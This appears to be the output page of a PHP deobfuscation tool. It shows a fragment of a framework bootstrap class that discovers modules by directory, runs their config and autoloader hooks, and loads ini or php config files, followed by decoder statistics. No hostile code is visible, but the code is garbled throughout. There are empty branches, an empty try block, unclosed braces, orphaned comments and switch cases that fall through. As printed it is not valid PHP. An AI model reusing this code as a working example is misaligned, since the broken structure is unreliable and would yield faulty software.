				} elseif ($request->issetQuery('update')) {
				} elseif ($request->issetQuery('upgrade')) {
				} elseif ($request->issetQuery('upgrade_delete')) {

		try {
		} catch (\Core\Exception $e) {
			//throw new \Core\Exception($e);
			echo \Core\Base\Action::getInstance()->showPhpError($e->getCode()?$e->getCode():E_COMPILE_ERROR, $e->getMessage(), $e->getFile(), $e->getLine());

	public function setView_manager($options = array()) {
		return $this;
	public function initModules() {
		$modules = glob($this->getFrontController()->getModuleDirectory() . DIRECTORY_SEPARATOR . '*');
		if($modules) {
			foreach($modules AS $module) {
				if(file_exists($module . DIRECTORY_SEPARATOR . 'Module.php')) {
					$name = strtolower(basename($module));
					$namespace = $this->getFrontController()->formatModuleName($name);
					if(!isset($this->modules[$namespace]) && \Core\Base\Action::getInstance()->allow($name)) {
						if(!class_exists($namespace . '\\Module', false)) {
							include_once $module . DIRECTORY_SEPARATOR . 'Module.php';
						$moduleName = $namespace . '\\Module';
						$this->modules[$namespace] = new $moduleName();

     * Get class resources (as resource/method pairs)
     * Uses get_class_methods() by default, reflection on prior to 5.2.6,
     * as a bug prevents the usage of get_class_methods() there.
     * @return array
    public function getClassResources($namespace) {
        if (!isset($this->modules_methods[$namespace])) {
            if (version_compare(PHP_VERSION, '5.2.6') === -1) {
                $class        = new \ReflectionObject($namespace . '\\Module');
                $classMethods = $class->getMethods();
                $methodNames  = array();

                foreach ($classMethods as $method) {
                    $this->modules_methods[$namespace][] = $method->getName();
            } else {
                $this->modules_methods[$namespace] = get_class_methods($namespace . '\\Module');

        return $this->modules_methods[$namespace];
	public function executeModules($type = 'start') {

		foreach($this->modules AS $namespace => $object) {
			$module_methods = $this->getClassResources($namespace);
			if($type == 'start') {
				if(in_array('getConfig', $module_methods)) {
					$options = $object->getConfig();
					if (null !== $options) {
						if (is_string($options)) {
							$options = $this->_loadConfig($options);
						} elseif ($options instanceof \Core\Config\Main) {
							$options = $options->toArray();
						} elseif (!is_array($options)) {
							throw new \Core\Exception('Invalid options provided; must be location of config file, a config object, or an array');

				if(in_array('getAutoloaderConfig',$module_methods)) {
					$autoload = $object->getAutoloaderConfig();
					if($autoload && is_array($autoload)) {
						foreach($autoload AS $key => $namespaces) {
							if(is_array($namespaces)) {

				/*if(method_exists($object, 'onBootstrap') && is_callable(array($object, 'onBootstrap'))) {

			} else if($type == 'before_dispatch') {
				if(in_array('onBeforeDispatch',$module_methods)) {

     * Load configuration file of options
     * @param  string $file
     * @throws \Core\Exception When invalid configuration file is provided
     * @return array
    protected function _loadConfig($file)
    	if(!file_exists($file)) {
    		return array (
					"system_version" => "3.0",
					"frontController" => array (
						"moduleDirectory" => APPLICATION_PATH . "/modules",
						"defaultModule" => "home",
						"display_exceptions" => 1 
					'view_manager' => array (
						'display_exceptions' => false,
						'template_map' => array (
							'layout' => APPLICATION_PATH . '/modules/Home/layout/layout.phtml',
							'error/404' => APPLICATION_PATH . '/modules/Home/views/Error/404.phtml',
							'error/index' => APPLICATION_PATH . '/modules/Home/views/Error/index.phtml',
							'error/php' => APPLICATION_PATH . '/modules/Home/views/Error/php.phtml' 
        $environment = $this->getEnvironment();
        $suffix      = strtolower(pathinfo($file, PATHINFO_EXTENSION));

        switch ($suffix) {
            case 'ini':
        		require_once 'Config/Ini.php';
                $config = new \Core\Config\Ini($file, $environment);

            case 'php':
        		require_once 'Config/Php.php';
				$config = new \Core\Config\Php($file, $environment);

                throw new \Core\Exception('Invalid configuration file provided; unknown config type');

        return $config->toArray();
     * @param string $name
     * @return Ambigous <NULL, multitype:>|multitype:
    public function getModules($name = null) {
    	if($name !== null) {
    		return isset($this->modules[$name]) ? $this->modules[$name] : null;
    	} else {
    		return $this->modules;

Function Calls





MD5 591a52cf4ceff569df914f003a9a9275
Eval Count 0
Decode Time 113 ms